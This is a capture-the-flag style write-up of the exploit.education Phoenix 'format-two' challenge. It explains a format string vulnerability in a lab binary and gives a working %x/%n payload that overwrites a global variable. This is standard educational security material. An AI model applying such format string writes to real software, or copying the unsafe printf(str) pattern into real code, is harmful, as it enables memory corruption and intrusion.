Post

Format Two | Phoenix - exploit.education

Posted
By Debrunbaix
2 min read
Format Two | Phoenix - exploit.education

Format Two

Ressources

Binary : format-two
Platform : exploit.education - Phoenix

Analysis

Let’s try running the binary to understand how it behaves.

Execution

1
2
3
4
5
6
7

./format-two
Welcome to phoenix/format-two, brought to you by https://exploit.education
Better luck next time!

./format-two test
Welcome to phoenix/format-two, brought to you by https://exploit.education
testBetter luck next time!

Source Code

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23

int changeme;

void bounce(char *str) {
  printf(str);
}

int main(int argc, char **argv) {
  char buf[256];

  if (argc > 1) {
    memset(buf, 0, sizeof(buf));
    strncpy(buf, argv[1], sizeof(buf));
    bounce(buf);
  }

  if (changeme != 0) {
    puts("Well done, the 'changeme' variable has been changed correctly!");
  } else {
    puts("Better luck next time!\n");
  }

  exit(0);
}

Key Observations

  • The bounce() function directly uses printf(str), where str comes from user input — a classic format string vulnerability.
  • We are allowed to pass input via the command line (argv[1]).
  • The goal is to modify the global variable changeme to any non-zero value.

Exploitation

Strategy

To exploit this, we need to:

  1. Find where our input lands on the stack by printing various %x values.
  2. Use the %n format specifier to write to a specific memory address — that of the changeme variable.

Finding changeme

We assume we already know the address of changeme. For the Phoenix VM, it’s commonly at 0x600af0. (This address might change depending on the environment.)

Payload

1

./format-two $'%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%n\xf0\x0a\x60'

Explanation:

  • The chain of %x is used to shift through the stack until the correct offset is reached.
  • %n writes the number of bytes printed so far into the memory address placed afterward.
  • \xf0\x0a\x60 is the little-endian representation of 0x600af0, the address of changeme.

Output

1
2

Welcome to phoenix/format-two, brought to you by https://exploit.education
Well done, the 'changeme' variable has been changed correctly!

Conclusion

This challenge introduces %n exploitation via format strings. It’s a powerful feature of printf() that writes data to memory, and it becomes dangerous when the format string is user-controlled.

The difficulty here was identifying the stack offset and using the correct memory address to perform a direct write.

exploit.education, Pwn
exploit.education Pwn Format-string
This post is licensed under CC BY 4.0 by the author.